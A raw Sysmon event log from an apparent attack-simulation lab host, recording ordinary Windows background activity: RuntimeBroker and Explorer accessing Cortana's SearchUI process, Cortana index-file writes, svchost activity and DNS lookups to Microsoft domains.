13:58:36.179{59A5CD1D-93F9-6005-F104-00000000A301}45405944C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000012509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.133{59A5CD1D-93F9-6005-F104-00000000A301}45406112C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12bc4b|C:\Windows\System32\Windows.Storage.dll+12db23|C:\Windows\System32\Windows.Storage.dll+12bb5c|C:\Windows\System32\Windows.Storage.dll+12f2d1|C:\Windows\System32\Windows.Storage.dll+12e5ac|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x800000000000000012508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.133{59A5CD1D-93F9-6005-F104-00000000A301}45406112C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12bbe8|C:\Windows\System32\Windows.Storage.dll+12db04|C:\Windows\System32\Windows.Storage.dll+12bb5c|C:\Windows\System32\Windows.Storage.dll+12f2d1|C:\Windows\System32\Windows.Storage.dll+12e5ac|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x800000000000000012507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.133{59A5CD1D-93F9-6005-F104-00000000A301}45406112C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12cd6b|C:\Windows\System32\Windows.Storage.dll+12c245|C:\Windows\System32\Windows.Storage.dll+12c022|C:\Windows\System32\Windows.Storage.dll+12f28a|C:\Windows\System32\Windows.Storage.dll+12e5ac|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x800000000000000012506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.133{59A5CD1D-93F9-6005-F104-00000000A301}45405944C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ce7c|C:\Windows\System32\Windows.Storage.dll+e5b69|C:\Windows\System32\Windows.Storage.dll+e5cf4|C:\Windows\System32\Windows.Storage.dll+615c6|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000012505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.133{59A5CD1D-93F9-6005-F104-00000000A301}45406112C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+60e40|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.133{59A5CD1D-93F9-6005-F104-00000000A301}45406112C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ceeb|C:\Windows\System32\Windows.Storage.dll+5fb52|C:\Windows\System32\Windows.Storage.dll+60148|C:\Windows\System32\Windows.Storage.dll+19f723|C:\Windows\System32\Windows.Storage.dll+60e25|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x800000000000000012503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.133{59A5CD1D-93F9-6005-F104-00000000A301}45406112C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+60513|C:\Windows\System32\Windows.Storage.dll+19f828|C:\Windows\System32\Windows.Storage.dll+19f709|C:\Windows\System32\Windows.Storage.dll+60e25|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c|C:\Windows\System32\Windows.Storage.dll+e8a72 10341000x800000000000000012502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.133{59A5CD1D-93F9-6005-F104-00000000A301}45405944C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ce7c|C:\Windows\System32\Windows.Storage.dll+e5b69|C:\Windows\System32\Windows.Storage.dll+e5cf4|C:\Windows\System32\Windows.Storage.dll+615c6|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 11241100x800000000000000012501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.117{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{dcd82308-7c7c-448b-9acd-bef049aea78c}\0.2.filtertrie.intermediate.txt2021-01-18 13:58:36.117 11241100x800000000000000012500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.117{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{dcd82308-7c7c-448b-9acd-bef049aea78c}\0.1.filtertrie.intermediate.txt2021-01-18 13:58:36.117 11241100x800000000000000012499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.117{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{dcd82308-7c7c-448b-9acd-bef049aea78c}\0.0.filtertrie.intermediate.txt2021-01-18 13:58:36.117 11241100x800000000000000012498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.086{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{a53efd33-e9b5-4f22-bc95-35387fae0220}\appssynonyms.txt2016-04-15 08:09:24.000 10341000x800000000000000012497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.023{59A5CD1D-93FA-6005-FC04-00000000A301}37841192C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a4660|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952B4B17)|UNKNOWN(FFFFD3D9952AF1A1)|UNKNOWN(FFFFD3D9952B0B6A)|UNKNOWN(FFFFD3D9952AEE26)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a7ecb|C:\Windows\System32\SHELL32.dll+6988a|C:\Windows\System32\SHCORE.dll+33fad 10341000x800000000000000012496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.023{59A5CD1D-93FA-6005-FC04-00000000A301}37841192C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a4141|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952B4B17)|UNKNOWN(FFFFD3D9952AF1A1)|UNKNOWN(FFFFD3D9952B0B6A)|UNKNOWN(FFFFD3D9952AEE26)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a7ecb|C:\Windows\System32\SHELL32.dll+6988a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000012495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.023{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{a53efd33-e9b5-4f22-bc95-35387fae0220}\settingssynonyms.txt2021-01-18 13:58:36.023 11241100x800000000000000012494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.023{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{a53efd33-e9b5-4f22-bc95-35387fae0220}\appssynonyms.txt2021-01-18 13:58:36.023 11241100x800000000000000012493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.023{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{a53efd33-e9b5-4f22-bc95-35387fae0220}\settingsconversions.txt2021-01-18 13:58:36.023 11241100x800000000000000012492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.023{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{a53efd33-e9b5-4f22-bc95-35387fae0220}\appsconversions.txt2021-01-18 13:58:36.023 11241100x800000000000000012491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.008{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{a53efd33-e9b5-4f22-bc95-35387fae0220}\settingsglobals.txt2021-01-18 13:58:36.008 11241100x800000000000000012490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.008{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{a53efd33-e9b5-4f22-bc95-35387fae0220}\appsglobals.txt2021-01-18 13:58:36.008 22542200x800000000000000012489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.283{59A5CD1D-8E46-6005-1600-00000000A301}1544dmd.metaservices.microsoft.com0type: 5 devicemetadataservice.trafficmanager.net;type: 5 vmss-prod-eas.eastasia.cloudapp.azure.com;::ffff:20.189.118.208;C:\Windows\System32\svchost.exe 22542200x800000000000000012488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.252{59A5CD1D-8E46-6005-1600-00000000A301}1544go.microsoft.com0type: 5 go.microsoft.com.edgekey.net;type: 5 e11290.dspg.akamaiedge.net;::ffff:104.125.79.182;C:\Windows\System32\svchost.exe 22542200x800000000000000012487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.058{59A5CD1D-8E56-6005-2E00-00000000A301}2464149.224.70.40.in-addr.arpa.9003-C:\Windows\sysmon64.exe 10341000x800000000000000013188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.429{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.429{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.429{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.429{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.429{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.429{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 